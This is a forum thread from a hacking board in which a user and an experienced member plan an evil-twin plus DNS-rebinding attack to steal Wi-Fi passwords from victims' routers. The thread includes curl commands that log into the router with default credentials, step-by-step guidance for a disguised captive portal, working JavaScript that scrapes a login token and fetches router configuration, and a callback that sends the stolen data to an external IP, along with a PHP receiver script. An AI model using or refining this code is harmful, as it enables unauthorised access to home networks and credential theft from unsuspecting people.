did any one try this dns rebinding attack?

Discussion in 'Forum for discussion of ANTICHAT' started by mooooooon, 16 Apr 2019.

  1. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    how can i perform dns rebinding using evil twin in local level ?!
    [​IMG]
    how can i perform dns rebinding using evil twin in local level ?

    as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack

    using evil twin on local level

    the curl command to login into the router

    curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

    the curl command to get the page that contains the wifi password

    curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

    this how i was planing to perform the attack
    evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....

    but now i don't know how will get the html file back if want to use it in local level only

    what do you think folks ?
     
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,285
    Likes Received:
    8,518
    Reputations:
    113
    Interesting attack.
    Actually with an evil twin you can also exploit the router this way:

    1. Your evil twin network range and gateway should be the same as victim's network
    2. Create a captive portal at the gateway address like http://192.168.0.1/mycaptiveportal/
    2.1. The link should be unique, so there will be no collision with actual router web pages
    2.2. Decorate or disguise it with a loading bar / waiting text / similar infinite animation that will make victim user wait for something
    2.3. In the background it should periodically probe for existing router web pages - since we're located at the gateway address, there will be no cross-domain or cross-origin problems, you can just do it with AJAX
    3. Once the victim has loaded the page, shut down evil twin, so device will connect back to original AP
    4. At this stage the code of captive portal will be able to access real router, it will fetch its main page, and depending on the returned data it will perform further steps (authorization, fetching additional pages or scripts, etc.)
    5. Once the code has found the page with Wi-Fi password, it will generate and perform callback to an evil URL outside of gateway (i.e. some URL from the Internet), this can be done by appending <img> or <script> tag with external source to the DOM tree.

    This method is much easier, and does not require sending any links to the victim. So there are prerequisites for successful exploiting:

    1. Properly configured evil twin with captive portal
    2. External website with a script configured to receive Wi-Fi password (or any other arbitrary data)
    3. Victim user should open captive portal page in browser (because some devices are closing it immediately when disconnecting from evil twin)

    If you've done everything correctly, you will also get victim's external IP address as a bonus. ;)
     
    TOX1C, Triton_Mgn, crlf and 1 other person like this.
  3. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    thanks


    i think fluxion already does this but i will need to change the ip to 192.168.1.255 or something so it doesn't interface with the router !

    i prefer to just disconnect them from the rouge ap and stop mdk3 .

    you mean send the page back to my web server ?
    i think sending a request to enable the second ssid would work if we want to do it totally offline .
    btw
    can we make it check if it's connected to the internet
    if yes then execute the code ?!


    can we bypass this by making a big button in the middle of the page titled open in the browser ... and when the user clicks on it he gets asked to use the preferred browser to open it !

    there is still one problem i don't know AJAX :( ?
    so i need someone professional help :)
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,285
    Likes Received:
    8,518
    Reputations:
    113
    Not a good idea, it's broadcast address.
    There are not many routers supporting multiple VAPs.

    But if victim's router supports that, it can be done without making external requests.
    Yes we can, just learn about javascript handlers.
     
    Triton_Mgn likes this.
  5. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    and ajax programming language . right ?

    so no one would shorten the way for me :(
     
  6. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1

    about the part of the code where it exploits the router using ajax!
    how can i add new commands?
    or edit it!
    can someone explain these lines ... the first ones of them!

    Code:
    <?php
          // cache this page for a long time
          header("Cache-Control: max-age=2592000");
        header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
    ?>
    <html>
        <head>
        </head>
        <body>
            <h1>This is a sticky page...</h1>
              <script>
                var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g
                var timer = setInterval(function(){info();} ,5000);
    
                function info()
                {
               
                        xhr=new XMLHttpRequest();
                                   
                    xhr.open("GET", "http://ligeti.com/", false);
                        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                    xhr.send();
    
                    var result = pattern.exec(xhr.responseText);
                    //alert (xhr.responseText);
    
                    if(result != null)
                    {
                        if (result.length > 1)
                        {
                            var login = new XMLHttpRequest();
                            var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin";
                            //console.log(result[1]);
                            login.open("POST", "http://ligeti.com/", false);
                                            login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                                            login.send(param);
                                        //console.log(login.responseText);
                            clearInterval(timer);
                            var template = new XMLHttpRequest();
                            template.open("GET", "http://ligeti.com/template.gch", false);
                            template.send();
                            //console.log(template.responseText);
                            alert("Hacked");
                            sendResults(template.responseText);
                        }
                    }
                }
                function sendResults(data)
                {
                    alert("Sending Data");
                    myCallback= function(data){console.log(data)}
                            script = document.createElement('script');
                    script.type = 'text/javascript';
                    //myData =  data.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
                    console.log(data);
                    script.src =  encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
                    document.head.appendChild(script);
                    }
                info();
              </script>
        </body>
    </html>
    
    what i need to change in this code and get the Logintoken from the page?
    in which format should i save the code? php or html?

    where do i put this php file

    Code:
    <?php
        $file = '/tmp/secret.html';
        $que = $_GET["secret"];
        file_put_contents($file, $que);
        echo ''.$que;
    ?>
    
    what are the missing steps of setting the server ! ? what are they !

    how does this one work? var pattern = /getObj\("Frm_Logintoken"\).value = "(. *)"; / g

    i tried to run it in the console of chrome in the router page but it did not work !
     
  7. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    @binarymaster


    i have tested it and all what i getting is this

    [​IMG]


    [​IMG]

    and when i blocked my ip just like the article i got this

    [​IMG]

    any ideas ??
     
  8. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    @binarymaster what do you mean by saying this ?
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,285
    Likes Received:
    8,518
    Reputations:
    113
    Just learn HTML and JavaScript and you will understand what I said. ;)
     
  10. mooooooon

    mooooooon New Member

    Joined:
    4 Feb 2019
    Messages:
    43
    Likes Received:
    0
    Reputations:
    1
    @binarymaster


    why i did got the cors policy while on local side ?

    what do you suggest ?
    should i spoof the router ip ?
     
Loading...